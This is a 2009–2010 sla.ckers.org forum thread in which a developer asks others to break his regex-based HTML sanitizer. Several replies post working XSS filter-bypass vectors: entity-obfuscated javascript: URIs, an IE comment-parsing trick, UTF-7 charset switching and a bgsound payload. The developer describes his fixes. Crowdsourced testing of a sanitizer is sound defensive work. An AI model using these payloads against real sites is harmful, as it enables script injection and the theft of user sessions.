Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 13, 2009 08:59PM

Quick question: can you break it?
URL: http://eaea.sirdarckcat.net/testhtml.html

The objective is simple:
Quote

Find valid HTML code that will be parsed incorrectly by the parser, AND/OR code that executes (if I forgot to remove some vector).

I will be removing basic JS execution vectors. Anyway, the CSS parser is not ready yet, so I'll disable CSS completely. Also, namespaces won't be allowed (no XUL nor SVG), and ns tags (<asdf:asdf>) will also be disabled for the time being.

Frames won't be allowed (nor embed/object/video/audio/etc.), and I think that's all :).
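A minimal sketch of the tag rules above, in plain JavaScript so it runs without a DOM. `isAllowedTag` and `BLOCKED_TAGS` are hypothetical names, the tag name is assumed to be already extracted by the parser, and the list only contains what this post names (reading "frames" as frame, frameset and iframe). Because the post's own list ends in "etc.", an allowlist of known-safe tags would be the stricter choice.

```javascript
// Hypothetical tag filter following the rules in this post; not the
// parser's real code. The blocked list mirrors the post and is not complete.
const BLOCKED_TAGS = new Set([
  "script", // basic JS execution
  "style", // CSS is disabled for now
  "frame", "frameset", "iframe", // frames
  "embed", "object", "video", "audio",
  "svg", // no SVG content
]);

function isAllowedTag(rawName) {
  const name = rawName.toLowerCase();
  // Namespaced tags such as <asdf:asdf> (or xul:..., svg:...) are rejected.
  if (name.includes(":")) return false;
  // Anything that is not a plain element name is rejected too.
  if (!/^[a-z][a-z0-9]*$/.test(name)) return false;
  return !BLOCKED_TAGS.has(name);
}
```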

If you can execute JS let me know please :).

On IE I try to honor conditional comments; however, I won't support them completely, since they are unsafe by default.

If you find some way to get HTML code where it shouldn't be in weird scenarios, you win!

I have to warn you that code like this:
<a href="asdf'><img src="http://www.google.com">hello</a>

Will be parsed as:
<a>hello</a>

That's because every time I find a " in an attribute's name, I delete all the attributes in the tag, for security reasons.

So this other code (it's important to note there's no closing " quote):
<a href="asdf'><img src='http://www.google.com'>hello</a>

Will be parsed as:
<a><img src="http://www.google.com">hello</a>

Some may argue that's a vulnerability, but there's no safer way of treating unclosed quotes in attributes.

Another thing: I am only allowing ' and " as quotes (so ` won't work).
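The two quoting rules above (drop every attribute once a quote shows up in an attribute name, and treat only ' and " as quotes) could be sketched like this. It is a hypothetical reimplementation for illustration, not the code behind testhtml.html: `parseAttributes` and `serializeAttributes` are invented names, `src` is assumed to be the raw text between the tag name and the closing `>`, and an unquoted value containing a stray quote (the unclosed-quote case) is treated the same way as a quote in a name.

```javascript
// Hypothetical sketch of the attribute rules described in this post; not the
// code behind testhtml.html. `src` is the raw text between the tag name and
// the closing '>', e.g. ' href="x" title=y'.
function parseAttributes(src) {
  // A name, optionally followed by ="...", ='...' or an unquoted value.
  // Only ' and " count as quotes; ` is an ordinary character here.
  const attrRe = /\s*([^\s=>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?/g;
  const attrs = [];
  let m;
  while ((m = attrRe.exec(src)) !== null) {
    const name = m[1];
    const unquoted = m[4];
    // A quote inside a name, or a stray (unclosed) quote in an unquoted value,
    // means the quoting is broken: drop every attribute of the tag.
    if (/["']/.test(name) || (unquoted !== undefined && /["']/.test(unquoted))) {
      return [];
    }
    attrs.push([name.toLowerCase(), m[2] ?? m[3] ?? unquoted ?? ""]);
  }
  return attrs;
}

// Always write values back inside double quotes, escaping the characters
// that could end the value or be taken as a quote (including `).
function serializeAttributes(attrs) {
  const esc = (v) =>
    v.replace(/"/g, "&quot;").replace(/'/g, "&#39;").replace(/`/g, "&#96;")
     .replace(/</g, "&lt;").replace(/>/g, "&gt;");
  return attrs.map(([name, value]) => ` ${name}="${esc(value)}"`).join("");
}
```

Writing every value back inside double quotes means a backtick in the input can never act as a delimiter in the output, whatever a given browser thinks of `.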

So, examples of bypasses I've found (and that are now fixed):
<!--[if true]><img onerror=alert(1) src=-->
<form action=javascript:alert(1)><input type=submit>

Protections vary from browser to browser (I will only remove dangerous things on a browser if they are dangerous in that browser).

I will make the CSS parser this week :)

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: July 14, 2009 02:25PM

<form action=&#000000000j&#000000000a&#000000000v&#000000000ascript&#000000000:alert(1)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: July 14, 2009 05:34PM

<body
<li background="javascript:alert(1)"

Works in FF, Chrome but not in Opera - well played!

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 14, 2009 09:09PM

@gareth
Thanks! But I can't reproduce it. On which browser?

My tests:
On Firefox 3:
The requested URL /�j�a�v�ascript�:alert(1) was not found on this server.

On IE8 and IETab:
<FORM action="?j?a?v?ascript?:alert(1)">

On Opera 9:
The requested URL /�j�a�v�ascript�:alert(1) was not found on this server.

On Chrome 3:
The requested URL /& was not found on this server.

On Safari:
The requested URL /& was not found on this server.


@.mario
I can't reproduce :(

this

<body
<li background="javascript:alert(1)"

gets interpreted as:
<head></head><body><li background="javascript:alert(1)"></li></body>

and Firefox doesn't execute javascript: URIs in background (as far as I've tested). Am I missing something? =/

Greetings!!

Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: July 15, 2009 04:11AM

Sorry, I should have tested it. I thought the HTML decoder was removing the entities, but I couldn't see the nulls etc. in the source. Anyway, this should work (without a parent charset):-

<html>
<head>
<title>hello, world.</title>
</head>
<form action=&#160;javascript:alert(1)><meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /><input type=submit></form>+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-
</body>
</html>

Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: July 15, 2009 04:16AM

@sdc: Yes :) I was trying to say good work in my own words. The background gets stripped only on the browsers where it would be executed: Opera and IE.
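The principle from the first post (only remove something in the browsers where it is dangerous), together with the observation above that background is only stripped in Opera and IE, could be modelled as a per-engine table. This is a sketch under assumptions: `needsUrlCheck`, the engine labels and the table entries are hypothetical, and detecting the engine is left to the caller. href, src and action are checked everywhere, action because of the `<form action=javascript:alert(1)>` bypass listed in the first post.

```javascript
// Hypothetical per-engine policy table; engine names and entries are
// assumptions. Trident = IE, Presto = Opera, Gecko = Firefox,
// WebKit = Chrome/Safari.
const ALL_ENGINES = ["trident", "presto", "gecko", "webkit"];

const URL_ATTRIBUTES = new Map([
  ["href", ALL_ENGINES],
  ["src", ALL_ENGINES],
  ["action", ALL_ENGINES], // <form action=javascript:...>
  ["background", ["trident", "presto"]], // only dangerous in IE and Opera
]);

// True if `attr` has to be URL-checked (or dropped) for this engine.
// A Map is used so names like "constructor" don't hit Object.prototype.
function needsUrlCheck(attr, engine) {
  const engines = URL_ATTRIBUTES.get(attr.toLowerCase());
  return engines !== undefined && engines.includes(engine);
}
```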

Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: July 15, 2009 05:15AM

Opera only vector:-
<img src=javascript&#4864:alert(1)>

Reproduces randomly in Opera

Edited 1 time(s). Last edit at 07/15/2009 05:54AM by Gareth Heyes.

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 15, 2009 07:23AM

Quote

<html>
<head>
<title>hello, world.</title>
</head>
<form action=&#160;javascript:alert(1)><meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /><input type=submit></form>+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-
</body>
</html>
hm.. why should it work? haha I use document.write(), which ignores Content-Type metas afaik (this is a bug I will address when events are working perfectly, and that will happen when I manage to finish the CSS parser).

Quote

@sdc: Yes :) I was trying to say good work in my own words. the background gets stripped on only the browsers where it would be executed - Opera and IE.
oh!! thanks then haha :D

Quote

<img src=javascript&#4864:alert(1)>
very nice gareth!! any particular reason to choose that char? fuzzing? do you have fuzz results? haha

Greetz!!

Edited 1 time(s). Last edit at 07/15/2009 07:25AM by sirdarckcat.

Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: July 15, 2009 10:54AM

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
+ADw-script+AD4-alert(1)+ADw-/script+AD4-

Doesn't trigger an alert - but should work in other setups. I think changing the charset should be prohibited. Thoughts?

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 16, 2009 02:12AM

I think document.write protects against this, but that's purely empirical knowledge.

I will disallow Content-Type in http-equiv then :), just to be sure
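Disallowing Content-Type in http-equiv might look like the following check, assuming the attributes of a `<meta>` tag have already been parsed into [name, value] pairs with lowercased names. `isAllowedMeta` is a hypothetical helper, and also rejecting the HTML5 `<meta charset>` form is an extra assumption that goes beyond what was said in this thread.

```javascript
// Hypothetical <meta> check; `attrs` is assumed to be a list of
// [name, value] pairs with lowercased names.
function isAllowedMeta(attrs) {
  for (const [name, value] of attrs) {
    // http-equiv="Content-Type" can switch the page charset (e.g. to UTF-7).
    if (name === "http-equiv" && value.trim().toLowerCase() === "content-type") {
      return false;
    }
    // Assumption, not from this thread: block the HTML5 <meta charset> form too.
    if (name === "charset") return false;
  }
  return true;
}
```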

Greetz!!

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: July 21, 2009 10:18PM

Now I'm using JSReg:
http://eaea.sirdarckcat.net/testhtml.html

So, well! I'm (still) working on the CSS parser.

I was going to apply the attributes to the elements myself, but I discovered that's waaaaaaaaaay too slow, even with algorithmic-fu stuff haha. It's been the biggest algorithmic challenge I've had since the informatics olympiad/ACM, but it's impossible to optimize: after reviewing the WebKit/Mozilla implementations, their solutions are the same or have a higher complexity, and my code lives in JS, so it's slower :( (they are also slow on the same rules I have problems with, like nth-child and the like).

Now I'll just filter the CSS (in a JSReg-like approach), since the HTML parser, for example, was reconstructing the DOM and building it from scratch.

Edited 3 time(s). Last edit at 07/21/2009 10:24PM by sirdarckcat.

Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: November 26, 2009 04:51AM

So my friend you tempted me on twitter and if you wanted to social engineer me into testing your HTML parser it worked :)

IE only:-
<!---><script>alert(1)</script>-->
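This vector presumably works because IE closes the comment at `<!--->` itself, while a filter that uses the usual `<!--...-->` pattern believes the comment runs until the last `-->`, so the script tag is never examined. The HTML5 tokenizer also treats `<!-->` and `<!--->` as complete empty comments. A hypothetical comment stripper that follows that reading is sketched below; `stripComments`, `COMMENT` and `NAIVE_COMMENT` are invented names, and dropping every comment (IE conditional comments such as the `<!--[if true]>` bypass from the first post included) is a simplification compared to honoring them.

```javascript
// Hypothetical comment stripper; not the parser's real code.
// A naive pattern treats "<!--->" as the start of a comment that runs to the
// next "-->", which hides whatever follows from the tag filter.
const NAIVE_COMMENT = /<!--[\s\S]*?-->/g;

// Treat "<!-->" and "<!--->" as complete empty comments, accept "--!>" as a
// terminator, and drop an unterminated comment up to the end of the input.
const COMMENT = /<!--(?:-?>|[\s\S]*?--!?>|[\s\S]*$)/g;

function stripComments(html) {
  return html.replace(COMMENT, "");
}
```

With the second pattern the script tag is left in the markup, where the normal tag filter gets to see it and remove it.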

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: November 26, 2009 12:06PM

nice :) I hate IE hahaha

thanks!! :D now I have to break jsreg again.. hahaha

Re: Break a regex-based HTML parser
Posted by: rvdh
Date: November 27, 2009 12:10PM

I wish that old maluc was still with us, he always got some crazy shit going on with vectors, talkin' about 4 years ago on sla.ckers.

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: January 12, 2010 08:42AM

https://twitter.com/theharmonyguy/status/7666627119

Re: Break a regex-based HTML parser
Posted by: doody
Date: January 23, 2010 01:13PM

Hi, first post here =). Hope this is valid:

<a href="javascript&#0:alert('1');">click me</a>

Re: Break a regex-based HTML parser
Posted by: Anonymous User
Date: January 23, 2010 02:36PM

Nice one doody! I think that's valid :) It can even be obfuscated some more

<a href="javascript &#x:alert('1');">click me</a>

Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: January 23, 2010 04:20PM

Cool nice ones

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: January 24, 2010 07:32AM

niice!

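o=new Option;
o.innerHTML='javascript&#x0;:alert(1);'; // &#x0; (U+0000) right before the ':'
h=o.textContent; // the decoded string
a=document.createElement('a');
a.setAttribute('href',h);
o.appendChild(a);
a.appendChild(document.createTextNode('a'));
a=o.innerHTML; // DOM -> String
o.innerHTML=a; // String -> DOM again
o.childNodes[1].href.match(/t:/); // non-null if that character was lost and href now reads "javascript:"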

it's a bug in Gecko when transforming DOM to String :)

It's not the first one. I added one more thing to the regex that cleans attributes, as well as pre-parsing for href attributes.

That should cover similar bugs. I'm thinking about how to solve problems like this in the long term; sadly I can't just do innerHTML+=''; browsers suck =/.
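A hedged sketch of what pre-parsing for href-like attributes could look like, written against the vectors posted in this thread (&#0 and zero-padded references, &#4864, a leading &#160;, the digitless &#x). It decodes numeric character references roughly the way HTML parsers do (leading zeros allowed, semicolon optional), removes control characters, spaces and NBSP, and then accepts only an explicit list of schemes instead of searching for "javascript:". `isSafeUrl`, `decodeNumericRefs` and the scheme list are assumptions; named references are only partly handled, so a complete entity table would be needed in practice.

```javascript
// Hypothetical pre-parsing step for URL attributes (href, src, action, ...);
// a sketch, not the parser's actual regex.
const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode &#DDD; / &#xHHH; with any number of leading zeros and an optional ';'.
function decodeNumericRefs(s) {
  return s.replace(/&#(?:x([0-9a-f]+)|([0-9]+));?/gi, (_, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    // Out-of-range and surrogate code points become U+FFFD.
    if (cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return "\uFFFD";
    return String.fromCodePoint(cp);
  });
}

function isSafeUrl(raw) {
  const decoded = decodeNumericRefs(raw);
  // A leftover "&#" is a malformed reference (e.g. "&#x" with no digits):
  // reject it instead of guessing how each browser reads it.
  if (decoded.includes("&#")) return false;
  // Named references are not decoded here, so anything beyond the basic
  // ones (e.g. HTML5's &colon;) is treated as suspicious.
  if (/&(?!(?:amp|lt|gt|quot);)[a-z][a-z0-9]*;/i.test(decoded)) return false;
  // Drop U+0000, other control characters, spaces and NBSP, which the
  // vectors in this thread hide inside or before the scheme.
  const s = decoded.replace(/[\u0000-\u0020\u007f-\u00a0]/g, "");
  const colon = s.indexOf(":");
  if (colon === -1) return true; // no scheme at all: relative URL
  const delim = s.search(/[\/?#]/);
  if (delim !== -1 && delim < colon) return true; // ':' is in path/query/fragment
  return SAFE_SCHEMES.has(s.slice(0, colon).toLowerCase());
}
```

The allowlist is what catches the Opera &#4864 case: the decoded scheme is "javascript" followed by U+1300, which matches none of the allowed schemes, so there is no need to know how a particular browser treats that character.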

Thanks!!! :)

Edited 1 time(s). Last edit at 01/24/2010 07:49AM by sirdarckcat.

Re: Break a regex-based HTML parser
Posted by: Gareth Heyes
Date: January 24, 2010 09:04AM

@sirdarckcat

How about using document fragments to check the parsed HTML:-

https://developer.mozilla.org/En/DOM/Document.createDocumentFragment

Re: Break a regex-based HTML parser
Posted by: sirdarckcat
Date: January 24, 2010 07:36PM

Well, two problems..

One is that our old IE6 supports little to none of DOM Level 3, and the other is that the bug appears when the code is transformed from DOM to String: if, instead of doing document.write(cleanDOM.innerHTML), the user does document.documentElement.appendChild(cleanDOM), this bug would not happen.

I hate Gecko bugs :(
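A more general guard against bugs that only show up when the cleaned DOM is turned back into a string is to require the sanitizer to be idempotent: run it again on its own serialized output and reject the input if anything changes. The sketch assumes the sanitizer can be called as a plain string-to-string function; `sanitizeStable` and `toySanitize` are hypothetical, and the toy only imitates a serializer that silently drops U+0000, it is not a real sanitizer. In a browser, the first pass would end with the real serialization (cleanDOM.innerHTML), which is the step where the Gecko bug appears.

```javascript
// Hypothetical guard: a correct sanitizer's output should pass through the
// sanitizer unchanged. If a second pass still finds something to remove, the
// serialized form differs from what was checked, so the input is rejected.
function sanitizeStable(html, sanitize) {
  const once = sanitize(html);
  return sanitize(once) === once ? once : "";
}

// Toy sanitizer for illustration only: it removes href attributes whose value
// starts with "javascript:", then "serializes" by deleting U+0000, roughly
// imitating the DOM-to-String behaviour described above.
function toySanitize(html) {
  const filtered = html.replace(/\shref="javascript:[^"]*"/gi, "");
  return filtered.replace(/\u0000/g, "");
}
```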

Re: Break a regex-based HTML parser
Posted by: p0deje
Date: September 09, 2010 12:57PM

<bgsound src='javascript:alert(1)'> - Opera, IE

---------
http://p0deje.blogspot.com


